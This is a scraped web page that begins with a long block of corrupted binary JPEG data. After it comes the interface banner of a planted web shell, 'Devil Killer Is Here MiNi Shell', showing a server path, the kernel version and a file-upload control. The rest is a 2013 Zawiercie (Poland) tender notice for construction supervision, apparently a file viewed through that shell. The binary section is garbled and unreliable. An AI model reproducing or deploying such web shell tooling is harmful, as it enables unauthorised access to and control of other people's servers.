JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130712/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130712/274098-N-2013.html

<p class="kh_header"><b>Zawiercie: Świadczenie usług pełnobranżowego nadzoru inwestorskiego nad pracami inwestycyjnymi realizowanymi w ramach  Projektu Poprawa atrakcyjności inwestycyjnej Gminy Zawiercie 
poprzez kompleksowe uzbrojenie 
Strefy Aktywności Gospodarczej - Obszar A.</b><br>
<b>Numer ogłoszenia: 274098 - 2013; data zamieszczenia: 12.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pełnobranżowego nadzoru inwestorskiego nad pracami inwestycyjnymi realizowanymi w ramach  Projektu Poprawa atrakcyjności inwestycyjnej Gminy Zawiercie 
poprzez kompleksowe uzbrojenie 
Strefy Aktywności Gospodarczej - Obszar A..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Świadczenie usług pełnobranżowego nadzoru inwestorskiego nad pracami inwestycyjnymi realizowanymi w ramach  Projektu Poprawa atrakcyjności inwestycyjnej Gminy Zawiercie poprzez kompleksowe uzbrojenie Strefy Aktywności Gospodarczej - Obszar A.
Zamówienie współfinansowane jest ze środków Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 Priorytet I. Badania i rozwój technologiczny (B+R), innowacje i przedsiębiorczość Poddziałanie 1.1.1 Infrastruktura rozwoju gospodarczego.
Podstawowe  dane techniczne:

1)	w zakresie kanalizacji sanitarnej:
kanały z rur PCV o 200 mm                                             1 539,50 mb,
studnie prefabrykowane betonowe o 1000mm                          44 szt;

2)	w zakresie sieci wodociągowej:
rurociągi o średnicy  o 250 mm żeliwo sferoidalne            405,50 mb,
rurociągi o średnicy  o 200 mm żeliwo sferoidalne         1 528,50 mb,
rurociągi o średnicy  o 100 mm żeliwo sferoidalne            153,00 mb,
hydranty przeciwpożarowe nadziemne DN 80                          17 szt;

3)	w zakresie kanalizacji deszczowej:
kanał o 1200mm  PP                                                          275,50 mb,
kanał o 1000mm  PP                                                          369,50 mb,
kanał o 800mm    PP                                                            98,50 mb,
kanał o 600mm    PP                                                            53,50 mb,
kanał o 500mm    PP                                                          236,00 mb,
kanał o 400mm    PP                                                          483,00 mb,
kanał o 300mm    PP                                                          579,00 mb,
studnie z prefabrykatów betonowych i żelbetowych  o1200mm,  o1500mm, o2000mm, o 2500 mm  -  62 kpl.

4)	w zakresie zbiornika zapasowo-wyrównawczego:
rurociąg przelewu awaryjnego o 800mm PE                                                    6,00 mb,
rurociąg odpływowy ze zbiornika o 450mm PE                                              15,80 mb,
rurociągi tłoczne z pompowni deszczowej                                                      21,00 mb,
urządzenie oczyszczające - separator substancji                                                 1 szt;
ropopochodnych Qmax 1547 l/s        
wylot ścieków deszczowych do rowu                                                                     1 szt;
zbiornik zapasowo-wyrównawczy 2000 m3 otwarty, żelbetowy                             1 szt;
pompownia ścieków deszczowych                                                                         1 szt;
rozdzielnia elektryczna                                                                                           1 szt;
studnia pomiarowa o 2000mm                                                                               1 szt;
studnia połączeniowa prefabrykowana żelbetowa o 2000mm                               1 szt;
zjazd, droga dojazdowa i plac manewrowy o łącznej powierzchni                960,00 m2;

5)	w zakresie kanalizacji teletechnicznej:                   
kanalizacja pierwotna 2xHDPE 110/3,                                                          928,40 mb,
 kanalizacja pierwotna 2xRHDPEp 110/6,3                                                    65,20 mb,                 
kanalizacja pierwotna 1xHDPE 110/3,0                                                          35,80 mb,                  
 kanalizacja pierwotna 1xRHDPEp 110/6,3                                                    61,80 mb,                 
 studnie kablowe SKO-2                                                                                       20szt;                         
studnie kablowe SKR-1                                                                                         5 szt;                         
słupki oznaczeniowe SO                                                                                     10 szt;                      

6)	w zakresie instalacji elektrycznych i AKPIA przepompowni ścieków i zbiornika zapasowo-wyrównawczego:
stacja transformatorowa prefabrykowana                                    1 kpl,
rozdzielnia RT-SZR+RT-Z+RT-A                                                 1 kpl,
komplet instalacji zasilających, sterujących, 
         wyrównawczych i uziemiajacych                                                  1 kpl,
montaż słupów oświetleniowych z oprawami SGS 203/100         9 kpl.

	Szczegółowy zakres nadzorowanych prac określa dokumentacja projektowa oraz  specyfikacja techniczna wykonania i odbioru robót budowlanych zadania pn: Poprawa atrakcyjności inwestycyjnej Gminy Zawiercie poprzez kompleksowe uzbrojenie Strefy Aktywności Gospodarczej - Obszar A, których kopię otrzyma Wykonawca nadzoru po podpisaniu umowy. Dokumenty te dostępne są również na stronie internetowej http://www.zawiercie.bip.net.pl/?a=7235.
	Wykonawca zapewni pełny nadzór inwestorski nad robotami, ze szczególnym uwzględnieniem  Prawa budowlanego i innych obowiązujących przepisów oraz zgodnie z niniejszą umową, dokumentacją projektową inwestycji, wymaganiami inwestora i zasadami wiedzy technicznej. Nadzór musi być prowadzony przez  osoby, którzy posiadają odpowiednie uprawnienia wymagane przez Polskie Prawo Budowlane. 
Podstawowe obowiązki Wykonawcy w ramach pełnionego nadzoru to: 
1)	prowadzenie pełnego wielopoziomowego nadzoru inwestorskiego tj. w zakresie technicznym, terminowym, finansowym i sprawozdawczym nad robotami,   w szczególności w zakresie zgodnym z wymaganiami Polskiego Prawa Budowlanego i przepisów w tym zakresie obowiązujących. Nadzór powinien być prowadzony przez specjalistów branżowych posiadających odpowiednie uprawnienia przewidziane przepisami prawa polskiego;
2)	systematyczne monitorowanie i dokumentowanie postępów w realizacji Projektu zgodnie z dokumentacją techniczną, dokumentami przetargowymi oraz zatwierdzonymi harmonogramami oraz informowanie Zamawiającego o wszelkich kwestiach, które mogą zagrażać zakończeniu projektu oraz  zaproponowanie programów naprawczych;
3)	monitorowanie, sprawdzanie i występowanie do Zamawiającego z wnioskiem dotyczącym uaktualniania harmonogramu rzeczowo-finansowego realizacji robót budowlanych; 
4)	organizowanie i prowadzenie narad  technicznych, problemowych i innych spotkań, które będą prowadzone w razie potrzeby, ale nie rzadziej niż  jeden raz w tygodniu oraz przygotowywanie notatek i raportów w celu umożliwienia podejmowania decyzji o każdym zagadnieniu, które wpływa na postęp robót.  W spotkaniach tych powinny uczestniczyć wszystkie strony zaangażowane w Projekt. Inspektor nadzoru  będzie brał  także udział w spotkaniach organizowanych przez Zamawiającego;
5)	rozwiązywanie problemów i sporów powstałych w trakcie realizacji robót;
6)	ocena, aprobata bądź odrzucenie wszystkich wniosków Wykonawcy robót budowlanych zgodnie z obowiązującym prawem budowlanym. Wszystkie decyzje mogące wpływać na zakres umowy, jego czas trwania lub cenę wymagają zgody Zamawiającego;
7)	weryfikowanie, analizowanie i zatwierdzanie do zapłaty faktur wystawionych przez Wykonawcę robót budowlanych w związku z realizacją umowy z Wykonawcą;
8)	udzielanie regularnych konsultacji i doradztwa technicznego Zamawiającemu, czynnego uczestniczenia we wszelkich kontrolach jakim zostanie poddany Zamawiający w obszarze realizacji projektu wraz z udzielaniem wyjaśnień;
9)	sprawdzanie jakości wykonywanych robót, wbudowanych elementów, a w szczególności zapobieganie zastosowaniu materiałów budowlanych wadliwych i nie dopuszczonych do obrotu i stosowania.  Sprawdzanie czy wszystkie używane materiały posiadają świadectwa i certyfikaty jakości;
10)	sprawdzanie i odbiór robót ulegających zakryciu lub zanikających. Sporządzenia dokumentacji fotograficznej w wersji papierowej lub elektronicznej dla robót zanikających. Dodatkowo  uczestnictwo w odbiorach częściowych i końcowym, próbach szczelności wraz z przedstawicielem eksploatatora sieci. Sporządzanie  protokołów  odbiorowych;
11)	wydawanie kierownikowi budowy poleceń potwierdzonych wpisem do dziennika budowy dotyczących: wykonania prób, wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót, dowodów dopuszczenia do obrotu i stosowania wyrobów oraz urządzeń technicznych;
12)	zawieszenie robót w przypadku gdyby ich kontynuacja mogła wywołać zagrożenie życia lub zdrowia ludzi bądź spowodować znaczne straty materialne;
13)	bieżące konsultacje z autorem projektu w zakresie przyjętych rozwiązań w projekcie oraz  rozwiązań alternatywnych;
14)	weryfikowanie obmiarów każdego etapu  robót, a przyjęta metodologia musi być zgodna z przedmiarami robót oraz specyfikacją wykonania i odbioru robót określonymi w umowie z Wykonawcą robót;
15)	Inspektor nadzoru jest odpowiedzialny za terminowe otrzymywanie od Wykonawcy rozliczeń, oraz weryfikowanie tych rozliczeń;
16)	ścisła współpraca z Zamawiającym i dostarczanie wszystkich niezbędnych, żądanych dokumentów dotyczących  rozliczeń, oraz kwalifikowalności środków zgodnie z procedurami rozliczeniowymi Dysponenta środków;
17)	sporządzanie miesięcznych sprawozdań z przebiegu realizacji inwestycji, wykonywania zadań i obowiązków nałożonych na Wykonawcę,  i przedstawieniu ich Zamawiającemu, do dnia 5 każdego miesiąca, następującego po okresie sprawozdawczym,
18)	kontrola zgodności oznakowania robót z zatwierdzonym projektem tymczasowej organizacji ruchu (jeśli dotyczy);
19)	branie udziału w rozwiązywaniu wszelkiego rodzaju skarg i roszczeń osób trzecich wywołanych realizacją zadania;
20)	Inspektor Nadzoru powinny być dostępny na każde wezwanie Zamawiającego lub Wykonawcy robot oraz  powinien przebywać na terenie budowy co najmniej dwa razy w tygodniu;
21)	egzekwowanie od kierownika budowy dokonania poprawek bądź ponownego wykonania  wadliwie wykonanych robót, a także wstrzymanie robót w przypadku, kiedy ich kontynuacja może wywołać zagrożenia lub spowodować niedopuszczalną niezgodność z projektem  lub pozwoleniem na budowę;
22)	sprawdzanie i zatwierdzanie w porozumieniu z Zamawiającym dokumentacji powykonawczej w tym inwentaryzacji geodezyjnej powykonawczej sporządzonej przez Wykonawcę;
23)	nadzorowanie wszystkich prób związanych z odbiorem technicznym i rozruchem technologicznym sieci realizowanych w ramach projektu. Wszystkie koszty prób będą pokryte przez Wykonawcę robót. Inspektor nadzoru jest zobowiązany do uczestniczenia w próbach końcowych;
24)	przygotowanie kompletu dokumentów dla eksploatatora sieci;
25)	dokonanie końcowego rozliczenia Projektu z uwzględnieniem rozliczenia i przekazania środków trwałych. Zamawiający udostępni Inspektorowi nadzoru  dokumenty niezbędne do końcowego rozliczenia Projektu;
26)	wykonanie wszystkich innych czynności, które zostaną uznane za niezbędne dla prawidłowej realizacji Projektu;
27)	w okresie gwarancji udzielonej przez Wykonawcę robót, Wykonawca musi być dostępny na żądanie Zamawiającego w celu: nadzorowania wykonanych robót, sporządzenia dokumentacji z przeglądów gwarancyjnych m.in: wykazu usterek  i wad, wskazania przyczyn powstania usterek i podania zaleceń odnośnie ich usunięcia, sporządzenia kalkulacji (kosztorysu) dot. powstałych usterek i wad, nadzoru nad robotami wykonywanymi przez Wykonawcę w ramach usunięcia  stwierdzonych wad i usterek, udziału w pogwarancyjnym odbiorze robót, uczestnictwa w rozwiązywaniu sporów wynikłych na tle realizacji umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.52.10-4, 74.26.41.00-8, 74.26.30.00-0, 74.26.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, iż dysponuje lub będzie dysponował osobą lub osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane w zakresie zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane w zakresie zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane w zakresie zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów;
drogowej lub odpowiadające im ważne uprawnienia budowlane w zakresie zamówienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
Zamawiający, określając wymogi  w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz.U. z 2010 r., nr 243, poz. 1623) oraz ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. nr 63, poz. 394). Złożenie przez Wykonawcę w ofercie  oświadczenia upoważnionego przedstawiciela Wykonawcy o spełnieniu warunków udziału w postępowaniu (załącznik nr 1 do SIWZ) oraz wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia (wskazane przez Wykonawcę w wykazie osób) posiadają wymagane uprawnienia (załącznik nr 2 do SIWZ), będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu.  przypadku Wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z Wykonawców. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie ww. warunki.
Zamawiający wymaga, żeby Wykonawca wykazał, nie później niż na dzień składania ofert, spełnianie warunków, o których mowa powyżej.
W Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu (zał. nr 1 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 5 do SIWZ,
2)Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 6 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Z wykonawcą, który złoży najkorzystniejszą ofertę zostanie zawarta umowa, której wzór stanowi załącznik do niniejszej specyfikacji istotnych warunków zamówienia.
2.Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w przypadku, gdy:
1)Nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia.
2)Konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie.
3)Konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2007-2013 lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, w szczególności w zakresie sprawozdawczości.
4)Przekształcenia podmiotowego Wykonawcy.
5)Zmiany członków personelu kluczowego Wykonawcy, w przypadku wystąpienia nieprzewidzianych okoliczności takich jak: śmierć osoby, rezygnacja - odejście z pracy lub innych uniemożliwiających należyte wykonywanie obowiązków zgodnie z umową lub obowiązującym prawem. W takim jednak przypadku każda nowa osoba musi spełniać warunki określone przez Zamawiającego na etapie wyboru oferty w postępowaniu przetargowym.
6)Zamawiający zastrzega sobie możliwość dokonania zmian postanowień  umowy w zakresie terminu wykonania, w przypadku:
a)zaistnienia zdarzeń uniemożliwiających wykonanie umowy w terminie o którym mowa w §3 z przyczyn niezależnych od Wykonawcy lub Zamawiającego, udokumentowanych w sposób nie budzący zastrzeżeń, potwierdzonych protokolarnie. 
b)gdy zajdzie konieczność wykonania usług dodatkowych niedających się przewidzieć na etapie sporządzania oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawiercie.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Zawierciu, ul. Leśna 2, 42-400 Zawiercie, Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2013 godzina 10:00, miejsce: Urząd Miejski w Zawierciu, ul. Leśna 2 Punkt Obsługi Interesanta (Informacja), parter UM.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




